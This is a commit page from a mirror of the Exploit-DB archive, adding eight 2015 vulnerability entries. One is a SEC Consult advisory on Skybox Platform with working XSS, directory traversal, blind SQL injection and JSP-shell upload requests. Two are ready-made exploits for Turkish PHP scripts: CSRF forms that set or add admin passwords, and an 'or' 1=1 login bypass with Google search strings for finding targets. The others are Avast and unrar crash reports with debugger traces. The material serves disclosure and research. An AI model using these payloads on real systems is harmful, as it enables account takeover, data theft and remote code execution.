bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-12-11

Browse source 
8 new exploits
This commit is contained in:
Offensive Security 2015-12-11 05:01:56 +00:00
parent 69243df248
commit 9139d945b7
9 changed files with 447 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

8
files.csv
View file

@ -35188,3 +35188,11 @@ id,file,description,date,author,platform,type,port
38922,platforms/php/webapps/38922.txt,"AFCommerce /afcontrol/controlheader.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0
38923,platforms/windows/remote/38923.txt,"Apple Safari For Windows PhishingAlert Security Bypass Weakness",2013-12-07,Jackmasa,windows,remote,0
38924,platforms/php/webapps/38924.txt,"WordPress 2.0.11 '/wp-admin/options-discussion.php' Script Cross Site Request Forgery Vulnerability",2013-12-17,MustLive,php,webapps,0
38927,platforms/php/webapps/38927.txt,"iy10 Dizin Scripti - Multiple Vulnerabilities",2015-12-10,KnocKout,php,webapps,80
38928,platforms/php/webapps/38928.txt,"Gökhan Balbal Script 2.0 - CSRF Vulnerability",2015-12-10,KnocKout,php,webapps,80
38929,platforms/hardware/webapps/38929.txt,"Skybox Platform <=7.0.611 - Multiple Vulnerabilities",2015-12-10,"SEC Consult",hardware,webapps,8443
38930,platforms/multiple/dos/38930.txt,"Rar CmdExtract::UnstoreFile Integer Truncation Memory Corruption",2015-12-10,"Google Security Research",multiple,dos,0
38931,platforms/multiple/dos/38931.txt,"Avast OOB Write Decrypting PEncrypt Packed Executables",2015-12-10,"Google Security Research",multiple,dos,0
38932,platforms/multiple/dos/38932.txt,"Avast JetDb::IsExploited4x - Performs Unbounded Search on Input",2015-12-10,"Google Security Research",multiple,dos,0
38933,platforms/multiple/dos/38933.txt,"Avast Heap Overflow Unpacking MoleBox Archives",2015-12-10,"Google Security Research",multiple,dos,0
38934,platforms/windows/dos/38934.txt,"Avast Integer Overflow Verifying numFonts in TTC Header",2015-12-10,"Google Security Research",windows,dos,0

Can't render this file because it is too large.

265
platforms/hardware/webapps/38929.txt Executable file
View file

@ -0,0 +1,265 @@
SEC Consult Vulnerability Lab Security Advisory < 20151210-0 >
=======================================================================
title: Multiple Vulnerabilities
product: Skybox Platform
vulnerable version: <=7.0.611
fixed version: 7.5.401
CVE number:
impact: Critical
homepage: www.skyboxsecurity.com/products/appliance
found: 2014-12-04
by: K. Gudinavicius, M. Heinzl, C. Schwarz (Office Singapore)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"Skybox Security provides cutting-edge risk analytics for enterprise security
management. Our solutions give you complete network visibility, help you
eliminate attack vectors, and optimize your security management processes.
Protect the network and the business."
Source: http://www.skyboxsecurity.com/
Business recommendation:
------------------------
Attackers are able to perform Cross-Site Scripting and SQL Injection attacks
against the Skybox platform. Furthermore, it is possible for
unauthenticated attackers to download arbitrary files and execute arbitrary
code.
SEC Consult recommends the vendor to conduct a comprehensive security
analysis, based on security source code reviews, in order to identify all
available vulnerabilities in the Skybox platform and increase the security
of its customers.
Vulnerability overview/description:
-----------------------------------
1) Multiple Reflected Cross-Site Scripting Vulnerabilities
2) Multiple Stored Cross-Site Scripting Vulnerabilities
3) Arbitrary File Download and Directory Traversal Vulnerability
4) Blind SQL Injection Vulnerability
5) Remote Unauthenticated Code Execution
Proof of concept:
-----------------
1) Multiple Reflected Cross-Site Scripting Vulnerabilities
Multiple scripts are prone to reflected Cross-Site Scripting attacks.
The following example demonstrates this issue with the
service VersionRepositoryWebService:
POST /skyboxview/webservice/services/VersionRepositoryWebService HTTP/1.0
Content-type: text/plain
User-Agent: Axis/1.4
Host: localhost:8282
SOAPAction: ""
Content-Length: 863
<?xml version="1.0" encoding="UTF-8"?><soapenv:Envelope
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><soapenv:Body><ns1:checkV
ersion
soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:ns1="http://com/skybox/view/webservice/versionrepositoryc4f85">&l
t;a
xmlns:a=&apos;http://www.w3.org/1999/xhtml&apos;><a:body
onload=&apos;alert(1)&apos;/></a>9884933253b"><components
soapenc:arrayType="soapenc:string[1]" xsi:type="soapenc:Array"
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"><components
xsi:type="soapenc:string">Application</components></components><os
xsi:type="soapenc:string"
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">windows-64</os><curre
ntVersion
xsi:type="soapenc:string"
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">7.0.601</currentVersi
on></ns1:checkVersion></soapenv:Body></soapenv:Envelope>
Other scripts and parameters, such as the parameter status of the login script
(located at https://localhost:444/login.html) are affected as well. The
following request demonstrates this issue:
https://localhost:444/login.html?status=%27%3C/script%3E%3Cscript%3Ealert%28doc
ument.cookie%29%3C/script%3E
2) Multiple Stored Cross-Site Scripting Vulnerabilities
Multiple fields of the Skybox Change Manager, which can be accessed at
https://localhost:8443/skyboxview/, are prone to stored Cross-Site Scripting
attacks. For example when creating a new ticket, the title can be misused
to insert JavaScript code. The following request to the server demonstrates
the issue:
Request:
POST /skyboxview/webskybox/tickets HTTP/1.1
Host: localhost:8443
[...]
7|0|18|https://localhost:8443/skyboxview/webskybox/|272....5E|com.skybox.view.g
wt.client.service.TicketsService|createAccessChangeTicket|com.skybox.view.trans
fer.netmodel.tickets.AccessChangeTicketData/1874789321|com.skybox.view.transfer
.modelview.ChangeRequestGraph/1577593632|com.skybox.view.transfer.netmodel.phas
es.BasePhaseOperation/3921542662|java.util.Collection|com.skybox.view.transfer.
netmodel.PhaseDefinitionId/3246549697|java.lang.String/2004016611|com.skybox.vi
ew.transfer.properties.PropertyBag/343216801|com.skybox.view.transfer.netmodel.
TicketWorkflowId/3953158119|com.skybox.view.transfer.netmodel.ConfigurationItem
Id/1448062761|com.skybox.view.transfer.netmodel.tickets.ChangeRequestRiskEnum/8
52682809||skyboxview|test"><img
src=yy onerror=alert(document.cookie) >|java.util.ArrayList/41
Other fields, like "Comments" and "Description", are affected as well.
3) Arbitrary File Download and Directory Traversal Vulnerability
Skybox Change Manager allows to upload and download attachments for tickets.
The download functionality can be exploited to download arbitrary files. No
authentication is required to exploit this vulnerability. The following
request demonstrates the issue:
POST /skyboxview/webskybox/attachmentdownload HTTP/1.1
Host: localhost:8443
tempShortFileName=aaaaaa&tempFileName=../../../../../../../../../../../windows/
win.ini
The script /skyboxview/webskybox/filedownload is also affected by the same
vulnerability.
Note: The upload functionality can also be used to upload files without
authentication.
4) Blind SQL Injection Vulnerability
Arbitrary SQL queries can be inserted into the service VersionWebService. The
following request demonstrates this issue with a simple sleep statement:
POST https://localhost:8443/skyboxview/webservice/services/VersionWebService
HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
Content-Length: 619
Host: localhost:8443
Connection: Keep-Alive
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:ver="http://com/skybox/view/webservice/version">
<soapenv:Header/>
<soapenv:Body>
<ver:getUserLockInSeconds
soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<username xsi:type="soapenc:string"
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">admin&apos;+(select
* from (select(sleep(20)))a)+&apos;</username>
</ver:getUserLockInSeconds>
</soapenv:Body>
</soapenv:Envelope>
No authentication is required to exploit this vulnerability.
5) Remote Unauthenticated Code Execution
It is possible to upload WAR files, containing for example JSP files, which
will be automatically deployed by the Skybox appliance. This way, it is
possible to upload a JSP shell which enables an attacker to execute arbitrary
commands running in the same context as the web server running (by default
skyboxview).
The following request to the Skyboxview update service (located at
https://localhost:9443) uploads a JSP file. It will be uploaded to
/opt/skyboxview/thirdparty/jboss/server/web/deploy where it is automatically
extracted and deployed at
/opt/skyboxview/thirdparty/jboss/server/web/work/jboss.web/localhost.
POST /skyboxview-softwareupdate/services/CollectorSoftwareUpdate HTTP/1.1
Accept-Encoding: gzip,deflate
SOAPAction: ""
Content-Type: multipart/related; type="text/xml";
start="<rootpart@soapui.org>";
boundary="----=_Part_1_1636307031.1418103287783"
MIME-Version: 1.0
User-Agent: Jakarta Commons-HttpClient/3.1
Host: localhost:9443
Content-Length: 1944
------=_Part_1_1636307031.1418103287783
Content-Type: text/xml; charset=UTF-8
Content-Transfer-Encoding: 8bit
Content-ID: <rootpart@soapui.org>
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:sof="http://com/skybox/view/agent/webservice/softwareupdate">
<soapenv:Header/>
<soapenv:Body>
<sof:uploadPatch
soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<patchName xsi:type="soapenc:string"
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">../../thirdparty/jbos
s/server/web/deploy/helloworld2.war</patchName>
<patchData href="cid:helloworld.war"/>
</sof:uploadPatch>
</soapenv:Body>
</soapenv:Envelope>
------=_Part_1_1636307031.1418103287783
Content-Type: application/octet-stream; name=helloworld.war
Content-Transfer-Encoding: binary
Content-ID: <helloworld.war>
Content-Disposition: attachment; name="helloworld.war"; filename="helloworld.wa
r"
[binary]
Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in the Skybox platform
version 7.0.611, which was the most recent version at the time of discovery.
Vendor contact timeline:
------------------------
Communication with the vendor was handled by SEC Consult's client.
Solution:
---------
According to the release-notes, the issues have been fixed in the following
versions (reference number "19184"):
7.5.401: Reflected Cross-site scripting vulnerabilities
7.5.201: Remote Code Execution, SQL Injection, Arbitrary File Download and
Directory Traversal
Users of Skybox are advised to upgrade to version 7.5.401 or higher.
Workaround:
-----------
None
Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF M. Heinzl/ @2015

8
platforms/multiple/dos/38930.txt Executable file
View file

@ -0,0 +1,8 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=550
The attached file crashes in CmdExtract::UnstoreFile because the signed int64 DestUnpSize is truncated to an unsigned 32bit integer. Perhaps CmdExtract::ExtractCurrentFile should sanity check Arc.FileHead.UnpSize early.
I observed this crash in Avast Antivirus, but the origin of the code appears to be the unrar source distribution. I imagine many other antiviruses will be affected, and presumably WinRAR and other archivers.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38930.zip

27
platforms/multiple/dos/38931.txt Executable file
View file

@ -0,0 +1,27 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=554
The attached PEncrypt packed executable causes an OOB write on Avast Server Edition.
(gdb) bt
#0 0xf6f5e64a in EmulatePolyCode(_POLY_INFO*, int) () from /proc/self/cwd/defs/15092301/engine.so
#1 0xf6f7d334 in pencryptMaybeUnpack(CFMap&, _PEEXE_INFO*, asw::root::CGenericFile*, _EXE_UNPACK_INFO*) () from /proc/self/cwd/defs/15092301/engine.so
#2 0xf6f75805 in CPackWinExec::packIsPacked(CFMap&, void**, ARCHIVE_UNPACKING_INFO*) () from /proc/self/cwd/defs/15092301/engine.so
#3 0xf6e8d1a2 in CAllPackers::IsPacked(CFMap&, _SARCHIVERANGE*, unsigned int, unsigned int, unsigned int, unsigned int, CObjectName const*, unsigned int*, unsigned int*, _PEEXE_INFO**) () from /proc/self/cwd/defs/15092301/engine.so
#4 0xf6e784ef in CScanInfo::ProcessPackingReal(CObjectName&, CFMap&, _VIRUSDATAARRAY*, int&, unsigned int) () from /proc/self/cwd/defs/15092301/engine.so
#5 0xf6e78bdd in CScanInfo::ProcessPacking(CObjectName&, unsigned int, unsigned int) () from /proc/self/cwd/defs/15092301/engine.so
#6 0xf6e74fbd in CScanInfo::ProcessArea(CObjectName&, unsigned int, unsigned int) () from /proc/self/cwd/defs/15092301/engine.so
#7 0xf6e752af in CScanInfo::ProcessTopArea(CObjectName&, unsigned int) () from /proc/self/cwd/defs/15092301/engine.so
#8 0xf6e7d6db in avfilesScanRealMulti () from /proc/self/cwd/defs/15092301/engine.so
#9 0xf6e81915 in avfilesScanReal () from /proc/self/cwd/defs/15092301/engine.so
#10 0x0805d2a5 in avfilesScanReal ()
#11 0x0805498c in engine_scan ()
(gdb) x/i $pc
=> 0xf6f5e64a <_Z15EmulatePolyCodeP10_POLY_INFOi+7194>: mov WORD PTR [edx],ax
(gdb) p/x $edx
$7 = 0xe73f181f
(gdb) p/x $ax
$8 = 0x1060
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38931.zip

7
platforms/multiple/dos/38932.txt Executable file
View file

@ -0,0 +1,7 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=551
The attached Microsoft Access Database causes JetDb::IsExploited4x to be called, which contains an unbounded search for objects.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38932.zip

33
platforms/multiple/dos/38933.txt Executable file
View file

@ -0,0 +1,33 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=552
Trivial fuzzing of molebox archives revealed a heap overflow decrypting the packed image in moleboxMaybeUnpack. This vulnerability is obviously exploitable for remote arbitrary code execution as NT AUTHORITY\SYSTEM.
The attached testcase should cause heap corruption in AvastSvc.exe, please enable page heap if you have trouble reproducing.
HEAP[AvastSvc.exe]: ZwAllocateVirtualMemory failed c0000018 for heap 00310000 (base 0E560000, size 0006B000)
(474.9f8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0e5cb478 ebx=0dd70000 ecx=0000d87f edx=0e55f080 esi=00310000 edi=00003bf8
eip=7731836b esp=0be6d338 ebp=0be6d364 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
ntdll!RtlpDeCommitFreeBlock+0x146:
7731836b 80780703 cmp byte ptr [eax+7],3 ds:002b:0e5cb47f=??
#0 0xf702d588 in asw::root::NewDesCryptBlock(unsigned char*, unsigned int, unsigned char const*, bool, int) ()
#1 0xf702b009 in Mole_DecryptBuffer () from /proc/self/cwd/defs/15092301/engine.so
#2 0xf6f6a124 in moleboxMaybeUnpack(CFMap&, _PEEXE_INFO*, asw::root::CGenericFile*, _EXE_UNPACK_INFO*) ()
#3 0xf6f7630d in CPackWinExec::packGetNext(void*, ARCHIVED_FILE_INFO*) ()
#4 0xf6e8cdf3 in CAllPackers::GetNext(unsigned int, void*, ARCHIVED_FILE_INFO*) ()
#5 0xf6e76fc9 in CScanInfo::ProcessPackingReal(CObjectName&, CFMap&, _VIRUSDATAARRAY*, int&, unsigned int) ()
#6 0xf6e78bdd in CScanInfo::ProcessPacking(CObjectName&, unsigned int, unsigned int) ()
#7 0xf6e74fbd in CScanInfo::ProcessArea(CObjectName&, unsigned int, unsigned int) ()
#8 0xf6e752af in CScanInfo::ProcessTopArea(CObjectName&, unsigned int) ()
#9 0xf6e7d6db in avfilesScanRealMulti ()
#10 0xf6e81915 in avfilesScanReal ()
#11 0x0805d2a5 in avfilesScanReal ()
#12 0x0805498c in engine_scan ()
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38933.zip

48
platforms/php/webapps/38927.txt Executable file
View file

@ -0,0 +1,48 @@
.__ _____ _______
| |__ / | |___ __\ _ \_______ ____
| | \ / | |\ \/ / /_\ \_ __ \_/ __ \
| Y \/ ^ /> <\ \_/ \ | \/\ ___/
|___| /\____ |/__/\_ \\_____ /__| \___ >
\/ |__| \/ \/ \/
_____________________________
/ _____/\_ _____/\_ ___ \
\_____ \ | __)_ / \ \/
/ \ | \\ \____
/_______ //_______ / \______ /
\/ \/ \/
iy10 Dizin Scripti => Multiple Vulnerabilities (CSRF & Authentication Bypass)
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] HomePage : http://milw00rm.com - http://h4x0resec.blogspot.com
[~] Åžeker Insanlar : ZoRLu, ( milw00rm.com ),
Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, DaiMon
KedAns-Dz, b3mb4m
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : iy10 Dizin Scripti
|~Affected Version : All Version
|~Software : http://wmscripti.com/php-scriptler/iy10-dizin-scripti.html
|~RISK : High
|~Google Keyword : "Sitenizi dizine eklemek için tıklayın !"
################## ++ CSRF Admin Password Change Exploit ++ ######################################
<html>
<body>
<form action="http://[TARGET]/admin/kullaniciayarlar.php" method="POST">
<input type="hidden" name="kullaniciadi" value="knockout" />
<input type="hidden" name="sifre" value="password" />
<input type="hidden" name="Submit" value="Exploit!" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
################# ++ SQL Injection with Authentication Bypass ++###########################################
http://[TARGET]/admin
ID: 'or' 1=1
PW : 'or' 1=1
############################################################

42
platforms/php/webapps/38928.txt Executable file
View file

@ -0,0 +1,42 @@
.__ _____ _______
| |__ / | |___ __\ _ \_______ ____
| | \ / | |\ \/ / /_\ \_ __ \_/ __ \
| Y \/ ^ /> <\ \_/ \ | \/\ ___/
|___| /\____ |/__/\_ \\_____ /__| \___ >
\/ |__| \/ \/ \/
_____________________________
/ _____/\_ _____/\_ ___ \
\_____ \ | __)_ / \ \/
/ \ | \\ \____
/_______ //_______ / \______ /
\/ \/ \/
Gökhan Balbal v2.0 => Cross-Site Request Forgery Exploit (Add Admin)
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] HomePage : http://milw00rm.com - http://h4x0resec.blogspot.com
[~] Þeker Insanlar : ZoRLu, ( milw00rm.com ),
Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, DaiMon
KedAns-Dz, b3mb4m
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Gökhan Balbal
|~Affected Version : v2.0
|~Software : http://wmscripti.com/php-scriptler/gokhan-balbal-kisisel-web-site-scripti.html
|~RISK : High
|~Google Keyword : "DiL BECERiLERi" "HoBi" "TASARIM BECERiLERi"
##################++ Exploit ++ ######################################
<html>
<body>
<form action="http://[TARGET]/admin/ekleadmin2.php" method="POST">
<input type="hidden" name="kadi" value="knockout" />
<input type="hidden" name="sifre" value="password" />
<input type="hidden" name="Submit" value="Exploit!" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
############################################################

9
platforms/windows/dos/38934.txt Executable file
View file

@ -0,0 +1,9 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=549
If the numFonts field in the TTC header is greater than (SIZE_MAX+1) / 4, an integer overflow occurs in filevirus_ttf() when calling CSafeGenFile::SafeLockBuffer.
The TTC file format is described here https://www.microsoft.com/typography/otspec/otff.htm
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38934.zip